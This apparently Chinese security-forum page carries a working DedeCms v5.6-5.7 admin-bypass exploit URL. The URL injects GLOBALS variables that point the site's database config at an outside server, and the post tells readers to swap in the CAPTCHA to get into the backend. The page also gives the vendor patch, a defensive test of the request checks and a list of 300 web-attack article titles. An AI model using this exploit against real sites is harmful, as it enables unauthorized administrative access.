
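Forum content and invalid IDs will be cleaned up

Because the forum has been loosely managed lately, and with all kinds of "harmonization" pressure on top of that, the atmosphere for discussion is not what it used to be. A cleanup is therefore necessary. We hope everyone understands!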

 


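非安全中国网 disclaimer:
1. All statements and images in this post are solely the personal opinion of the poster and have nothing to do with this site's position;
2. This topic was posted by 無情; the poster 無情 complies with the six management rules of the "Copyright and Disclaimer Statement" and enjoys the related rights;
3. Other organizations or individuals must obtain the consent of the poster 無情 and of this site before using, reposting or quoting this post;
4. Part of this post is reproduced from other media and published on this site; the purpose of reproduction is to pass on more information and does not mean that this site agrees with its views or is responsible for its authenticity;
5. If this post infringes the copyright of your site or of an individual, please notify this site immediately; this site will delete it promptly and offers its deepest apologies;
6. The administrators and moderators of this site have the right to delete this post without notifying the poster in advance.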

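Should have been done long ago

Notice: the author has been banned or deleted; the content is automatically hidden

/picks nose  Uncle, you are not allowed to purge my little sock-puppet account...
Ugh, big sis here is no insider~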

DedeCms (织梦) v5.6-5.7 unauthorized access vulnerability
http://www.XXXX.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

Change validate=dcug above to the current CAPTCHA code and you can get straight into the site's admin backend.

The precondition for this vulnerability is that you must have obtained the admin backend path.

Official temporary fix:

Find the file include/common.inc.php and replace:

    foreach($_REQUEST as $_k=>$_v)
    {
        var_dump($_k);
        if( strlen($_k)>0 && preg_match('#^(cfg_|GLOBALS)#',$_k) )
        {
            exit('Request var not allow!');
        }
    }

with:

    // Check and register externally submitted variables
    function CheckRequest(&$val) {
        if (is_array($val)) {
            foreach ($val as $_k=>$_v) {
                CheckRequest($_k);
                CheckRequest($val[$_k]);
            }
        } else
        {
            if( strlen($val)>0 && preg_match('#^(cfg_|GLOBALS)#',$val) )
            {
                exit('Request var not allow!');
            }
        }
    }
    CheckRequest($_REQUEST);

Announcement: https://www.sitedirsec.com publishes the latest vulnerabilities; please follow it.
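An added example, not part of the original post and not DedeCms source code: the two request checks from the DedeCms post above, rewritten to return a result instead of calling exit(), and run over constructed query strings to show which parameter shapes each one rejects. The function names and the host name db.example.invalid are assumptions made for the illustration.

```php
<?php
// Added illustration, not DedeCms source code. Function names are hypothetical
// and the host name below is a constructed placeholder.

// The original check quoted in the post: only top-level request keys are tested.
function flatCheckRejects(array $request): bool
{
    foreach ($request as $k => $v) {
        $k = (string)$k;
        if (strlen($k) > 0 && preg_match('#^(cfg_|GLOBALS)#', $k) === 1) {
            return true;
        }
    }
    return false;
}

// Modelled on the replacement CheckRequest(): every key and every scalar value
// at any nesting depth is tested. Returns a bool instead of calling exit().
function recursiveCheckRejects($val): bool
{
    if (is_array($val)) {
        foreach ($val as $k => $v) {
            if (recursiveCheckRejects((string)$k) || recursiveCheckRejects($v)) {
                return true;
            }
        }
        return false;
    }
    $s = (string)$val;
    return strlen($s) > 0 && preg_match('#^(cfg_|GLOBALS)#', $s) === 1;
}

// Constructed query strings. parse_str() builds the same nested arrays that
// PHP builds for $_GET/$_POST from bracketed parameter names.
$samples = [
    'top-level cfg_ key'       => 'cfg_dbhost=db.example.invalid',
    'nested GLOBALS key'       => '_POST[GLOBALS][cfg_dbhost]=db.example.invalid',
    'ordinary login fields'    => 'dopost=login&userid=admin',
    'value starting with cfg_' => 'keyword=cfg_basehost',
];

foreach ($samples as $label => $query) {
    parse_str($query, $request);
    printf(
        "%-26s flat=%-6s recursive=%s\n",
        $label,
        flatCheckRejects($request) ? 'reject' : 'pass',
        recursiveCheckRejects($request) ? 'reject' : 'pass'
    );
}
```

The nested sample passes the flat check because its only top-level key is _POST. The last sample shows that the recursive version also rejects ordinary values that begin with cfg_ or GLOBALS, since it tests values as well as keys.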

(2006-2009) Summary of 300 Attack Techniques
(2006: 1-65 | 2007: 66-148 | 2008: 149-218 | 2009: 219-300) 300 ideas, 300 ways of thinking flexibly. Some of the articles can only be read by getting around the firewall.
1. The Attack of the TINY URLs
2. Backdooring MP3 Files
3. Backdooring QuickTime Movies
4. CSS history hacking with evil marketing
5. I know where you've been
6. Stealing Search Engine Queries with JavaScript
7. Hacking RSS Feeds
8. MX Injection : Capturing and Exploiting Hidden Mail Servers
9. Blind web server fingerprinting
10. JavaScript Port Scanning
11. CSRF with MS Word
12. Backdooring PDF Files
13. Exponential XSS Attacks
14. Malformed URL in Image Tag Fingerprints Internet Explorer
15. JavaScript Portscanning and bypassing HTTP Auth
16. Bruteforcing HTTP Auth in Firefox with JavaScript
17. Bypassing Mozilla Port Blocking
18. How to defeat digg.com
19. A story that diggs itself
20. Expect Header Injection Via Flash
21. Forging HTTP request headers with Flash
22. Cross Domain Leakage With Image Size
23. Enumerating Through User Accounts
24. Widespread XSS for Google Search Appliance
25. Detecting States of Authentication With Protected Images
26. XSS Fragmentation Attacks
27. Poking new holes with Flash Crossdomain Policy Files
28. Google Indexes XSS
29. XML Intranet Port Scanning
30. IMAP Vulnerable to XSS
31. Detecting Privoxy Users and Circumventing It
32. Using CSS to De-Anonymize
33. Response Splitting Filter Evasion
34. CSS History Stealing Acts As Cookie
35. Detecting FireFox Extentions
36. Stealing User Information Via Automatic Form Filling
37. Circumventing DNS Pinning for XSS
38. Netflix.com XSRF vuln
39. Browser Port Scanning without JavaScript
40. Widespread XSS for Google Search Appliance
41. Bypassing Filters With Encoding
42. Variable Width Encoding
43. Network Scanning with HTTP without JavaScript
44. AT&T Hack Highlights Web Site Vulnerabilities
45. How to get linked from Slashdot
46. F5 and Acunetix XSS disclosure
47. Anti-DNS Pinning and Circumventing Anti-Anti DNS pinning
48. Google plugs phishing hole
49. Nikon magazine hit with security breach
50. Governator Hack
51. Metaverse breached: Second Life customer database hacked
52. HostGator: cPanel Security Hole Exploited in Mass Hack
53. Firefox Extensions
54. ABC News (AU) XSS linking the reporter to Al Qaeda
55. Account Hijackings Force LiveJournal Changes
56. Xanga Hit By Script Worm
57. Advanced Web Attack Techniques using GMail
58. PayPal Security Flaw allows Identity Theft
59. Internet Explorer 7 "mhtml:" Redirection Information Disclosure
60. Bypassing of web filters by using ASCII
61. Selecting Encoding Methods For XSS Filter Evasion
62. Adultspace XSS Worm
63. Anonymizing RFI Attacks Through Google
64. Google Hacks On Your Behalf
65. Google Dorks Strike Again
66. Cross-Site Printing
67. Stealing Pictures with Picasa
68. HScan Redux
69. ISO-8895-1 Vulnerable in Firefox to Null Injection
70. MITM attack to overwrite addons in Firefox
71. Microsoft ASP.NET Request Validation Bypass Vulnerability
72. Non-Alpha-Non-Digit 3
73. Steal History without JavaScript
74. Pure Java™, Pure Evil™ Popups
75. Google Adsense CSRF hole
76. There’s an OAK TREE in my blog!?!?!
77. BK for Mayor of Oak Tree View
78. Google Docs puts Google Users at Risk
79. All Your Google Docs are Belong To US…
80. Java Applets and DNS Rebinding
81. Scanning internal Lan with PHP remote file opening.
82. Firefox File Handling Woes
83. Firefoxurl URI Handler Flaw
84. Bugs in the Browser: Firefox’s DATA URL Scheme Vulnerability
85. Multiviews Apache, Accept Requests and free listing
86. Optimizing the number of requests in blind SQL injection
87. Bursting Performances in Blind SQL Injection - Take 2
88. Port Scan without JavaScript
89. Favorites Gone Wild
90. Cross-Browser Proxy Unmasking
91. Spoofing Firefox protected objects
92. Injecting the script tag into XML
93. Login Detection without JavaScript
94. Anti-DNS Pinning ( DNS Rebinding ) : Online Demonstration
95. Username Enumeration Timing Attacks
96. Google GMail E-mail Hijack Technique
97. Recursive Request DoS
98. Exaggerating Timing Attack Results Via GET Flooding
99. Initiating Probes Against Servers Via Other Servers
100. Effects of DNS Rebinding On IE’s Trust Zones
101. Paper on Hacking Intranets Using Websites
102. More Port Scanning - This Time in Flash
103. HTTP Response Splitting and Data: URI scheme in Firefox
104. Res:// Protocol Local File Enumeration
105. Res Timing Attack
106. IE6.0 Protocol Guessing
107. IE 7 and Firefox Browsers Digest Authentication Request Splitting
108. Hacking Intranets Via Brute Force
109. Hiding JS in Valid Images
110. Internet Archiver Port Scanner
111. Noisy Decloaking Methods
112. Code Execution Through Filenames in Uploads
113. Cross Domain Basic Auth Phishing Tactics
114. Additional Image Bypass on Windows
115. Detecting users via Authenticated Redirects
116. Passing Malicious PHP Through getimagesize()
117. Turn Any Page Into A Greasemonkey Popup
118. Enumerate Windows Users In JS
119. Anti-DNS Pinning ( DNS Rebinding ) + Socket in FLASH
120. Iframe HTTP Ping
121. Read Firefox Settings (PoC)
122. Stealing Mouse Clicks for Banner Fraud
123. (Non-Persistent) Untraceable XSS Attacks
124. Inter Protocol Exploitation
125. Detecting Default Browser in IE
126. Bypass port blocking in Firefox, Opera and Konqueror.
127. LocalRodeo Detection
128. Image Names Gone Bad
129. IE Sends Local Addresses in Referer Header
130. PDF XSS Can Compromise Your Machine
131. Universal XSS in Adobe’s Acrobat Reader Plugin
132. Firefox Popup Blocker Allows Reading Arbitrary Local Files
133. IE7.0 Detector
134. overwriting cookies on other people’s domains in Firefox.
135. Embeding SVG That Contains XSS Using Base64 Encoding in Firefox
136. Firefox Header Redirection JavaScript Execution
137. More URI Stuff…
138. Hacking without 0days: Drive-by Java
139. Google Urchin password theft madness
140. Username Enumeration Vulnerabilities
141. Client-side SQL Injection Attacks
142. Content-Disposition Hacking
143. Flash Cookie Object Tracking
144. Java JAR Attacks and Features
145. Severe XSS in Google and Others due to the JAR protocol issues
146. Web Mayhem: Firefox’s JAR: Protocol issues
147. 0DAY: QuickTime pwns Firefox
148. Exploiting Second Life
149. CUPS Detection
150. CSRFing the uTorrent plugin
151. Clickjacking / Videojacking
152. Bypassing URL Authentication and Authorization with HTTP Verb Tampering
153. I used to know what you watched, on YouTube (CSRF + Crossdomain.xml)
154. Safari Carpet Bomb
155. Flash clipboard Hijack
156. Flash Internet Explorer security model bug
157. Frame Injection Fun
158. Free MacWorld Platinum Pass? Yes in 2008!
159. Diminutive Worm, 161 byte Web Worm
160. SNMP XSS Attack (1)
161. Res Timing File Enumeration Without JavaScript in IE7.0
162. Stealing Basic Auth with Persistent XSS
163. Smuggling SMTP through open HTTP proxies
164. Collecting Lots of Free 'Micro-Deposits'
165. Using your browser URL history to estimate gender
166. Cross-site File Upload Attacks
167. Same Origin Bypassing Using Image Dimensions
168. HTTP Proxies Bypass Firewalls
169. Join a Religion Via CSRF
170. Cross-domain leaks of site logins via Authenticated CSS
171. JavaScript Global Namespace Pollution
172. GIFAR
173. HTML/CSS Injections - Primitive Malicious Code
174. Hacking Intranets Through Web Interfaces
175. Cookie Path Traversal
176. Racing to downgrade users to cookie-less authentication
177. MySQL and SQL Column Truncation Vulnerabilities
178. Building Subversive File Sharing With Client Side Applications
179. Firefox XML injection into parse of remote XML
180. Firefox cross-domain information theft
181. Firefox 2 and WebKit nightly cross-domain image theft
182. Browser's Ghost Busters
183. Exploiting XSS vulnerabilities on cookies
184. Breaking Google Gears' Cross-Origin Communication Model
185. Flash Parameter Injection
186. Cross Environment Hopping
187. Exploiting Logged Out XSS Vulnerabilities
188. Exploiting CSRF Protected XSS
189. ActiveX Repurposing, (1, 2)
190. Tunneling tcp over http over sql-injection
191. Arbitrary TCP over uploaded pages
192. Local DoS on CUPS to a remote exploit via specially-crafted webpage (1)
193. JavaScript Code Flow Manipulation
194. Common localhost dns misconfiguration can lead to "same site" scripting
195. Pulling system32 out over blind SQL Injection
196. Dialog Spoofing - Firefox Basic Authentication
197. Skype cross-zone scripting vulnerability
198. Safari pwns Internet Explorer
199. IE "Print Table of Links" Cross-Zone Scripting Vulnerability
200. A different Opera
201. Abusing HTML 5 Structured Client-side Storage
202. SSID Script Injection
203. DHCP Script Injection
204. File Download Injection
205. Navigation Hijacking (Frame/Tab Injection Attacks)
206. UPnP Hacking via Flash
207. Total surveillance made easy with VoIP phone
208. Social Networks Evil Twin Attacks
209. Recursive File Include DoS
210. Multi-pass filters bypass
211. Session Extending
212. Code Execution via XSS (1)
213. Redirector’s hell
214. Persistent SQL Injection
215. JSON Hijacking with UTF-7
216. SQL Smuggling
217. Abusing PHP Sockets (1, 2)
218. CSRF on Novell GroupWise WebAccess
219. Persistent Cookies and DNS Rebinding Redux
220. iPhone SSL Warning and Safari Phishing
221. RFC 1918 Blues
222. Slowloris HTTP DoS
223. CSRF And Ignoring Basic/Digest Auth
224. Hash Information Disclosure Via Collisions - The Hard Way
225. Socket Capable Browser Plugins Result In Transparent Proxy Abuse
226. XMLHTTPReqest “Ping” Sweeping in Firefox 3.5+
227. Session Fixation Via DNS Rebinding
228. Quicky Firefox DoS
229. DNS Rebinding for Credential Brute Force
230. SMBEnum
231. DNS Rebinding for Scraping and Spamming
232. SMB Decloaking
233. De-cloaking in IE7.0 Via Windows Variables
234. itms Decloaking
235. Flash Origin Policy Issues
236. Cross-subdomain Cookie Attacks
237. HTTP Parameter Pollution (HPP)
238. How to use Google Analytics to DoS a client from some website.
239. Our Favorite XSS Filters and how to Attack them
240. Location based XSS attacks
241. PHPIDS bypass
242. I know what your friends did last summer
243. Detecting IE in 12 bytes
244. Detecting browsers javascript hacks
245. Inline UTF-7 E4X javascript hijacking
246. HTML5 XSS
247. Opera XSS vectors
248. New PHPIDS vector
249. Bypassing CSP for fun, no profit
250. Twitter misidentifying context
251. Ping pong obfuscation
252. HTML5 new XSS vectors
253. About CSS Attacks
254. Web pages Detecting Virtualized Browsers and other tricks
255. Results, Unicode Left/Right Pointing Double Angel Quotation Mark
256. Detecting Private Browsing Mode
257. Cross-domain search timing
258. Bonus Safari XXE (only affecting Safari 4 Beta)
259. Apple's Safari 4 also fixes cross-domain XML theft
260. Apple's Safari 4 fixes local file theft attack
261. A more plausible E4X attack
262. A brief description of how to become a CA
263. Creating a rogue CA certificate
264. Browser scheme/slash quirks
265. Cross-protocol XSS with non-standard service ports
266. Forget sidejacking, clickjacking, and carjacking: enter “Formjacking”
267. MD5 extension attack
268. Attack - PDF Silent HTTP Form Repurposing Attacks
269. XSS Relocation Attacks through Word Hyperlinking
270. Hacking CSRF Tokens using CSS History Hack
271. Hijacking Opera’s Native Page using malicious RSS payloads
272. Millions of PDF invisibly embedded with your internal disk paths
273. Exploiting IE8 UTF-7 XSS Vulnerability using Local Redirection
274. Pwning Opera Unite with Inferno’s Eleven
275. Using Blended Browser Threats involving Chrome to steal files on your computer
276. Bypassing OWASP ESAPI XSS Protection inside Javascript
277. Hijacking Safari 4 Top Sites with Phish Bombs
278. Yahoo Babelfish - Possible Frame Injection Attack - Design Stringency
279. Gmail - Google Docs Cookie Hijacking through PDF Repurposing & PDF
280. IE8 Link Spoofing - Broken Status Bar Integrity
281. Blind SQL Injection: Inference thourgh Underflow exception
282. Exploiting Unexploitable XSS
283. Clickjacking & OAuth
284. Google Translate - Google User Content - File Uploading Cross - XSS and Design Stringency - A Talk
285. Active Man in the Middle Attacks
286. Cross-Site Identification (XSid)
287. Microsoft IIS with Metasploit evil.asp;.jpg
288. MSWord Scripting Object XSS Payload Execution Bug and Random CLSID Stringency
289. Generic cross-browser cross-domain theft
290. Popup & Focus URL Hijacking
291. Advanced SQL injection to operating system full control (whitepaper)
292. Expanding the control over the operating system from the database
293. HTML+TIME XSS attacks
294. Enumerating logins via Abuse of Functionality vulnerabilities
295. Hellfire for redirectors
296. DoS attacks via Abuse of Functionality vulnerabilities
297. URL Spoofing vulnerability in bots of search engines (#2)
298. URL Hiding - new method of URL Spoofing attacks
299. Exploiting Facebook Application XSS Holes to Make API Requests
300. Unauthorized  TinyURL URL Enumeration Vulnerability